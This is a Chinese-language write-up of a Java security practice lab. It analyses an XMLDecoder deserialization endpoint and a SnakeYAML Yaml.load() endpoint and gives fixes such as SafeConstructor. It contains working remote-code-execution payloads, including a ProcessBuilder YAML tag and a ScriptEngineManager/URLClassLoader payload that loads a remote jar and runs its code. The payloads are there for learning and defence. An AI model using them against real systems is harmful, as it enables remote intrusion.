0.前言这个靶场的这两个漏洞写的不是很好而且也挺稀有的第一个简单了解一下就行第二个可以看一下那个payload的构建思路1.xmldecoder反序列化漏洞源代码分析package org.bewhale.javasec.controller.deserialize; import org.springframework.stereotype.Controller; import org.springframework.ui.Model; import org.springframework.web.bind.annotation.RequestMapping; import java.io.ByteArrayInputStream; import java.nio.charset.StandardCharsets; Controller RequestMapping(/home/deserialize) public class XMLDecoder { RequestMapping(/xmldecoder) public String xmlDecoder(String cmd, Model model) { StringBuilder results new StringBuilder(); String[] strCmd cmd.split( ); StringBuilder sb new StringBuilder().append(?xml version\1.0\ encoding\UTF-8\?) .append(java version\1.8.0_151\ class\java.beans.XMLDecoder\) .append( object class\java.lang.ProcessBuilder\\n) .append( array class\java.lang.String\ length\ strCmd.length \); for (int i 0; i strCmd.length; i) { sb.append( void index\ i \) .append( string strCmd[i] /string) .append( /void); } sb.append( /array) .append( void method\start\ /) .append( /object) .append(/java); String xml sb.toString(); try { java.beans.XMLDecoder xmlDecoder new java.beans.XMLDecoder(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8))); xmlDecoder.readObject(); xmlDecoder.close(); model.addAttribute(results, results.append(执行成功!).append(System.lineSeparator()).append(XML).append(System.lineSeparator()).append(sb)); } catch (Exception e) { e.printStackTrace(); model.addAttribute(results, results.append(e)); } return deserialize/xmldecoder; } }可以看到服务端主动去把XML拼好了然后去读取然后触发了漏洞正常来说应该是攻击者传入一段XML文件然后服务器交给XMLDecoder.readObject ()最终触发漏洞payload什么的直接输入命令就行都不用你去构造XML就像作者起的变量名一样,这真的很“sb”StringBuilder正常的代码应该是这样的XMLDecoder decoder new XMLDecoder(外部输入流); decoder.readObject();不是说这个代码没有问题的意思只是让人知道正常的流程而已修复思路java.beans.XMLDecoder 用来解析特定格式 XML、重建 Java 对象时XML 内可以直接指定任意类、调用任意方法。当前代码直接拼接可控参数 cmd 到 XML 文本送入 XMLDecoder 解析攻击者可控 XML 内容构造恶意标签调用ProcessBuilder.start()实现命令执行。XMLDecoder设计本身极度危险没有内置类白名单机制官方不推荐用于解析不受信任的数据。 能替换就替换使用 Jackson/JacksonXML、JAXB 等常规 XML 解析方案。知识扩展很多人混淆 XXE 和 XMLDecoderXXESAX/DOM 等 XML 解析器外部实体漏洞读取文件、内网探测XMLDecoder 漏洞JavaBean 专属对象反序列化可以直接调用方法 RCE二者完全不是一类漏洞。2.SnakeYAML 反序列化payload普通payload:!!java.lang.ProcessBuilder [cmd,/c,calc]SnakeYAML 在默认构造器下支持!!标签指定 Java 类自动实例化对象。和 Fastjsontype、Jacksonclass思想高度相似。ScriptEngineManagerURLClassLoader 方式远程加载 Jar:!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [http://127.0.0.1:8000/upload/yaml-payload.jar]]]]SnakeYaml 低版本支持 !!类名直接 new 对象同时支持把后面数组内容传入构造方法。!!javax.script.ScriptEngineManager实例化ScriptEngineManager对象。 它有一个带 ClassLoader 参数的构造函数public ScriptEngineManager(ClassLoader loader)方括号[xxx] YAML 语法给构造方法传入参数 所以等价 Java 代码ClassLoader loader URLClassLoader实例; new ScriptEngineManager(loader);!!java.net.URLClassLoader实例化 URLClassLoader作用远程加载网络上的 jar 包URLClassLoader 构造接收URL[]数组。[[ !!java.net.URL [http://127.0.0.1:8000/upload/yaml-payload.jar] ]]内层!!java.net.URL创建 URL 对象远程 jar 地址双层[[ ]]代表传入URL 数组匹配 URLClassLoader 构造方法参数类型等价纯 Java 代码payload 翻译成 JavaURL url new URL(http://127.0.0.1:8000/upload/yaml-payload.jar); URL[] urls new URL[]{url}; ClassLoader classLoader new URLClassLoader(urls); new ScriptEngineManager(classLoader);源代码分析package org.bewhale.javasec.controller.deserialize; import org.springframework.stereotype.Controller; import org.springframework.ui.Model; import org.springframework.web.bind.annotation.RequestMapping; import org.yaml.snakeyaml.Yaml; Controller RequestMapping(/home/deserialize) public class YamlLoad { RequestMapping(/yaml) public String yaml(String content, Model model) { try { Yaml y new Yaml(); y.load(content); model.addAttribute(results, 执行成功); } catch (Exception e) { e.printStackTrace(); model.addAttribute(results, e.toString()); } return deserialize/yaml; } }感觉没什么好分析的接口地址/home/deserialize/yaml?content可控yaml文本外部可控字符串直接传入Yaml.load()修复思路强制使用 SafeConstructor【首选通用根治不受版本限制】SafeConstructor黑名单禁止绝大多数危险类仅允许基础类型字符串、数字、List、Map不支持实例化自定义 / Java 危险类。// 不安全旧代码 // Yaml y new Yaml(); // 安全写法 Yaml y new Yaml(new SafeConstructor()); y.load(content);